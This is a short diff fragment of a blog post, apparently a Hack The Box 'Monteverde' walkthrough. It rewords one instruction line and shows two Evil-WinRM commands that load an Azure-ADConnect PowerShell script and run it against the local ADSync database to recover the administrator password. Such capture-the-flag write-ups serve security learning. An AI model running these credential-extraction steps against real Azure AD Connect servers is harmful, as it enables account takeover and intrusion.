1n4r1/1n4r1.github.io/_posts/2020-07-05-Hackthebox-Monteverde-Walkthrough.md

 ```

-Import the module and execute.
+Import the module and execute the function `Azure-ADConnect`.
 We can achieve a password for the user `administrator`.
 ```shell
 *Evil-WinRM* PS C:\Users\mhope\Documents> import-module ./Azure-ADConnect.ps1
 *Evil-WinRM* PS C:\Users\mhope\Documents> Azure-ADConnect -server 127.0.0.1 -db ADSync